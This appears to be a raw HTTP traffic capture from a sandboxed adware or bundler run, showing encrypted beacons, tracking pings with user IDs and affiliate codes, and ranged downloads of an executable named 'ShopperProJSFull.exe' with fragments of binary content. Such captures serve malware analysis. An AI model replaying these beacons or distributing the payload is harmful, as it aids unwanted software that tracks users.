GET /21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2ezeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIvOSmGLAMD/qTRcHKuVeTpZhKEBix7LJLFAL52sIXt4UiHBOm9AZr4oT70GRW6LxXQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd1JReJqqw1xf7 h81hw0eWAY8/tWrUBEVB2BoZjQ6FIIw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=QHucCbLl /ZGgpLO6W5H3hnacjZ2ZC2ezeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/Disnhn4e9d1WQpt2QRjjVcEy0WTW/eZlYKTDPukrgVX06CsIvOSmGLAMD/rEEASnTAt8o5xcz3vxGu/GBPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/DisnhoTNSIcb2Uyc HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:26 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=p9HAq5TtKa9F7U1zsAAEAbFP3xsPDpAtgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsmxP7YdWR5r9BKJkTiY0kK4P1EuvY4ytw35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9y1QHs3X92ilHPsYeJ7guqL3mQKhyBoITNs IILilpWF01K6uMI0cA8T/6N1hLWbnhG8n8BszUgZilnVC2xOWZar4DMAjReMo1Dlhnwcw2uNF8sq9pbsMIcG8xh rHuvvYa6hudO5b bOfKYKFCWV2wLsE5O/F8CjpTUO7heB bthMUP0yyU4VodidK03d0MuzZPHJU0qA9vA9GanF1RNNmMzXUezINFlsIV5dJNE8xQtEL6kO6MAPPRk3pYsWha92dV1 PcKMtTouTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45BRPYaUlmfRdFIv0wqksZ51Sl9Z6VLx I HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:26 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=iDRrwQhh7wtmS6nlSU/NTqG835x4//T1aMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWlSma92QTn2sr7GRIcOoydhUdGPD1b2Qs4eR0 6Iti9nqGVWRcbUjPZ333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVrvBOGo5I8L8Nh3QJEALW3QkFjibRkaLmSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYNdcr9M9goCFnm437Rwp3ALYLGwKvXHzIxmb7yrGl6ig== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:26 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=s5Ydxb c7o0DbDSBvTK 4Hq5aL5HWExgAZx7JfD/ZiNA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY8E9cK9dYE7s6Dkd6d9pF8iTYCy99Gl4E9Wqh4iojbHdqGvv5sqhroDaM1aE/ClNTTua4Maub6eCsivMaAupUnTb/7 kcvPCjjpeJfJMiPTs0JQd5HxgIXd/dqaEYXgO79I32qLmgkBzr0Y7vf0dioHxIkD535tYIazisLfVFTLWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YFxk58JurVk52xuLvM2GxYQ5nnmIZ1dQR6Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:26 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=EYAmqppYZO/KPGBAjb/btiFayG35BvjuKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyObdfeQRNwvtN83SQCeXx1TCLUISLCJlFqul4CnWC C4vHQ5iZIM1e7BHRbglB1j0/SAHLkS0Ky9Ro11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndSUXiaqsNcX /ofNYcNHlgGPP7Vq1ARFQdgaGY0OhSCM= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:27 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=/Fcwh0Xd/M1mS6nlSU/NTtC5z6b84PNjaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWlSma92QTn2sr7GRIcOoydhUdGPD1b2Qs4eR0 6Iti9nqGVWRcbUjPZ4nJwzEzT2yHUh 3ZGDmdW5pZis9f nTd2uwjb78QzN C k Oyp7Z NfvhxWb41huXuRoGH96TSjE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KybE/th1ZHmv0EomROJjSQrgPyvVweGBaX HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:27 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=XJYuqQQo69eJxiP7f9a/G0XtTXOwAAQBMu9XWFgdApmAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KybE/th1ZHmv0EomROJjSQrg/US69jjK3DfkKZPeLk1IXa8iDQLHG9inCtSd9DvDByFsXwpAaO73IYrkTZsU4NhsmfUZ6AggvI6ysdmxGwh8xGGDRZSzPReXL8vnWIdn2vk3V4Bt3e3S5OXRJ8cVOxp8ccBfhg1MGPQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd1JReJqqw1xf7 h81hw0eWAY8/tWrUBEVB2BoZjQ6FIIw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:27 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=bomaaVKFzzJmS6nlSU/NTtmLWZlHWHRdaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWlSma92QTn2sr7GRIcOoydhUdGPD1b2Qs4eR0 6Iti9nqGVWRcbUjPZpjkZwwc6dH6FzoNt4Ofsjzs1eJiiYYwojgb6v7cXpPt1TM5RZKPL8I3u sa6VCXauJSim0H32xeh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aP5VqPX5Zlqo/qvtb7DcQKwnST4L/oy1CaqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0aergfKagB5OmVixU3rc7xpy wbvfw4rJ4aEzUiHG9lMnA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:27 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=/TVH52TeC6TKPGBAjb/btiFCw8TNbDW2KB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyObfJsKHIM1ro2z8LjnD4BZNQQy9IgZy5lJKYX3Ti/i3YON3V5qfYBQRRUmpStNaTb9EkykGnz5PdJi1CRp07F4ZRCubuqRAnTtUsYja0YwBmQQeWksviRUhfZterOdBrBxh8h5o3YrXrZv qR/r3k14i5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkFE9hpSWZ9F0Ui/TCqSxnnVKX1npUvH4g= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:28 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=wvekM9Cn2bXKPGBAjb/btg MYfP ytabKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyObyBfkdHFoABez8LjnD4BZNQQy9IgZy5lJKYX3Ti/i3YNYlTZYFVSl7BQeC5LF6ah0rpfaXeB YwuYVlUn0AVnrxK0BnK2QDnhjRLWdbF/ZlRkHo9YSS// 6AqUZoVYaYqslbpiJVl1O8sY1sBZzE93jVQk8gY3vhjPQ6wHhFi22CNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVZZXXlPOL JdxOsvBqt15abnG0MGS7MFn HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:28 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=bdqY0vC4PYvKPGBAjb/btjeCxNdsViG7KB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyObj0N7bp/0QtTuE hIh9G/eRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KybE/th1ZHmv0EomROJjSQrgPyvVweGBaX HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:28 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Tue, 08 Sep 2015 06:54:28 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /app/ping.ashx?action=start&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=IGNvbnZlcnRlcjogMy4zLjEuNTsgZHJpdmVyOiBDOlxQcm9ncmFtIEZpbGVzXFlURG93bmxvYWRlclxzYm1udHIuc3lzIDEuMC4wLjI7IGhlbHBlcjogMS4wLjEuNTsgc2VydmljZTogMS4wLjEuNTsA&protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.ytdownloader.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:55:28 GMT
....


GET /app/ping.ashx?action=uidCreated&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=&protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.ytdownloader.com

Connection: Keep-Alive

HTTP/1

GET /utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15&rnd=27847 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:54 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=28053 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:59 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=done_mem_0&report=mini_s&ver=803&action=na&ms_vr=3&clock=24438&rnd=24757 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:55:19 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=5969&rnd=4904 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:55:00 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /4143.ashx?e=WL9usJOVMsOEyHZoFFyrCMo8YECNv9u2IULDxM1sNbYoHZkq4q5PhSAvELRpepitqGvv5sqhroDaM1aE/ClNTarMnJaQROuNQI32H5tXX1V1dA7x4KTM2T0tY TAasH KYX3Ti/i3YNNO4ethW6WjXT3HSH7IyY6iDaufm3fVolivtD1St2ps9NfeKQ69pBROdzeap4zJJInRbZ0JBsbGY IqCibN3ldP3GhIJ9WssI TdI1rDUfDKHsZyPUgteF21cA0rZRVWV1SYGELDwIeesStD0GefRo/lWo9flmWqj q 1vsNxArCdJPgv jLUJ5pdl3V4yoSZtC3ZUXmNv4hOEZ9fC9NN7s9C7tmmeIQ4UJj9eY3tRmk7I4yfJnN099XJYO ba2UwDaFJEA74lB0xM JMmHOf/CqmVamFpcHCY7SQZJ6CKD8QFo29WCpLsgxtpysupHCzhFkK8SQFPJhfGpa6r1ttomZQQFfz/kCGvtlCUNlcxdOHwPAKcUhuKm8Dhyvu4sbqxJOZ8KNNEpHtbIcwqzlLbphxpHgO p9SZw4YBH3MDkPlHiMBExjDPgZ11cIh4ppVhRq6Pt2o q0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mhfCqXqcp6BQ= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:19 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Tue, 08 Sep 2015 06:54:19 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=10665 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:55 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 05:30:43 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 5014

Content-Range: bytes 0-249999/2707440

X-Cache: Hit from cloudfront

Via: 1.1 2b7e0587e76bdc8afc2d63bea659b942.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KN5lkyP2HTvW2sH5kRgDto5mz4HbBCoLmUduL6kpOel6D04K93i-sQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.........T)......................................s....................
..@6)..............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 05:30:43 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 5014

Content-Range: bytes 500000-749999/2707440

X-Cache: Hit from cloudfront

Via: 1.1 2b7e0587e76bdc8afc2d63bea659b942.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6p6JWiz9PzZFj67kzEZa21zccLXZ--WCNPErFLrDdaaI4K3dOcoEUA==
...vNj..7..........@.>..@;S.. .zNP....u#...).........$R..4.........
RP...OY:..1..FBI..A....Zk1.}U..1......a..9....Ab..>.VV..=O.....;.z.
48.....$...,...o...wT......m..RC........d....{..jA.%ka...%.E_...t_.w..
.;.....d9p-fI.{.|.....A..N!`h...eE..\..o.F.7..a.(.;......9.......*....
&..t.&...n.F.u...<.u....t.......O........>...-..G.oX@:.Gh.a5..&g
t;En?..>.=0...D.0|....#.....e ...4...)QoR-.f..... .l:[email protected]'..p..;.]^
..44u...w..4M.......D.P].N... S..... ....?.....Y....4...Q.v.b...Z...i.
[..?..Hm!....W.D|8.F....q!.Q.|..cM.D..q).... .W...T$6.=|eq............
u.o....%<.$1......vM.c......D.....FD.E.ht......D....=Ecu..3MA......
t. ..^[email protected]..;..*.E.|.^A./....
..o\.._....b.....7U.>.....Q.f~.FUb....W...}./F..0L=.. ..n./..=.2*..
h..l`.l.:...h..h..7.x.d...y........... ..'Y..jt.N.M......c.1?..))...*.
......d......4:.e$.V......E.. .$..`.T.P..M7=>....Z.c..x.....Z.....W
...>...Aiu.[e..E,..Kt..NCML.R.G...!......O.M...".1/....L.9......../
.y.m...D..>..........c{9.... ..?..ln..Z....n.....r.~}{=.*TN....z.3.
x0XJD....!.K..k.4N... a.R..u.r.....R....][email protected];.
o...5...P........2..1...........o..".~..U.uY.c....2c....is6.GWX.y...Z.
..p.,...l..[...5..).n...........Rz...4(&.dFFc.......J..I.1...og.,.Q...
...D.?x........7.4`.&yp......qA...........yr.G..$T3|...b..].y1.~u...#g
..d.D..}.......B..%G.}.._......Nf.A.x....}.J..8A.pGN..........K...NS&.
).";.......1....&..n...p..|[email protected]..,..$..f/Y..Z.*M......v.R.
w>S...u........!...(uG....1..........E..%.... 'q.......!..}e...<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 05:30:43 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 5015

Content-Range: bytes 1000000-1249999/2707440

X-Cache: Hit from cloudfront

Via: 1.1 2b7e0587e76bdc8afc2d63bea659b942.cloudfront.net (CloudFront)

X-Amz-Cf-Id: dY-bp67EjWl67i2jutXOxN4epDtOT5XRnIztz6wvx9OkIVCy2Xqs0A==
S.......5.a..3....LM5.H4._.4fO. .W..sn....a$..u.. ..S.F..d49#.^..<.
......g..{N.G.........G...8.......;..J.....M......g..d......%...Jj...e
.[.9..Hf.._..1..k;.$..x..3.owo...w......]....3....`.#..On.(..}T#....Ps
`.[.h3.k.y............B..k.r.X........e..........>...T..it4..:...^.
...Q.......{K...<H.2...}.r.......8.rM(......E. 6......T v...."..?1.
....^..E.b...X..O^..'.oF|.J.;.6.N1qYI.1..8....=(.....#\...Q.t.Nz..0RD.
[email protected].....".UG...l..$.....O....K....$N..}.I.J.^p7...
=.......b.........bU}.2.."...D.."l,..).E.......}....mOc.P=.c3..H.K.w.&
gt;oj].......B.9JQ.T... y..... voX'2.....H.6.G....J=n..<.Ma^...E..}
...2..4.......t$.../...q..Uo.........{.[z.O.G...n"=.X._p>...N.4U.w.
.i....!.V%......h..t..*!...."._...zH..$.... ..m.....[...6....".8....,4
Ne!Q.........aY..F.o.....@2...;[email protected]:.,.8.G.......6....... ...L..s%.
6............S..G..V.2......Q.....l.H....`....l.#...k...8*o...4&.[..^.
F.^..I...F<..!..9...?.........0.i .....ij<....7Mu...~}...\..B]..
%C..Fp9x...Hv.t.*q.....>W'.%#s...... ......~.#.S.........M{X.......
,.?..|d.F.TOj.:..U).N.5..... ..l.hwd.="....m...bZz3..D.Q.*.jb.....d...
....... ..`.?.)....f......:>..2.......[c&.....6.!....#~.U.{.?.ym..c
....$..M?..7..t4..L}3..p.....I,I.[..7.../.,..[....HFr..*..#Q.N78.<.
i.2..d......v.[.D..8!........Sk...^I.pt..H@([email protected]...[i>6..
.S...".Q.k...|...T.}..R....e...W.*..o.....$.....@{F.........c....}...#
l.<,}.pz .)]...I......$.r..y....$[.{5A}8&j.I(Q......^L.k.`....y....
.w.A...o.............,.#...O.&4.DN.....G.......S.l?.=x...;...VD.P.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 06:54:18 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 1500000-1749999/2707440

X-Cache: Miss from cloudfront

Via: 1.1 2b7e0587e76bdc8afc2d63bea659b942.cloudfront.net (CloudFront)

X-Amz-Cf-Id: ZiuBIBqSQcJ1Jpf7m1IeDQQNoJFgcN21PnS56q24cP7ZHlp9szN4Ag==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Date: Tue, 08 Sep 2015
 06:54:18 GMT..Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT..ETag: "c6
05c91aadcbb1556cc6923f21bf4eac"..Accept-Ranges: bytes..Server: AmazonS
3..Content-Range: bytes 1500000-1749999/2707440..X-Cache: Miss from cl
oudfront..Via: 1.1 2b7e0587e76bdc8afc2d63bea659b942.cloudfront.net (Cl
oudFront)..X-Amz-Cf-Id: ZiuBIBqSQcJ1Jpf7m1IeDQQNoJFgcN21PnS56q24cP7ZHl
p9szN4Ag==....dz0....0.Y ..:.H..-..\.^...5x.t..C.9k.....%i.P....JQI...
....A.....0..s.v.6.MY..B...j.7......*.^...d......y....qi.#o...A..qSC|2
C...C... ..s..g.....".7y.9..x..lI.JFk.......BRr.4#..).k..N.....CY.R...
rp...PX..T\...:v`.,...>[V.I?>....~.*.4p.....#o..S.1.....|.y...w.
q7>......q.z..H^1(../R.=*.oO....k..'..JJ....n.1....H.*8.AV...w..&..
.@L.)..f..^2F..#..u..z...Z.........x....D..uyFU..\...o....`.n..W. ...Y
.IyM......<....M....~..L.]wl:.>..F..6.3y.U..(.b.AJ......3..`N...
...4...M.......eY<."t..<.n.....k...A..W$...|...s.....H..i.....%#
L.a.z*..D...`....:......B.....P.....}H.To..w...y.......U.5t....V.]."..
...KX/M..V.SL.....'P~X.K.C...s.6...;..>../.......$.....6V~l..w..lYx
.Q..,...Z..K?.d%.YiP.<..x..C..0.[,2?...6^jp.[t....}m}...xnKK.m..r..
Q...%.#A&V%..w.Ipb...h$. .W..;S..J...-.\.0!....'..jr_..5}..zT_].-F..9d
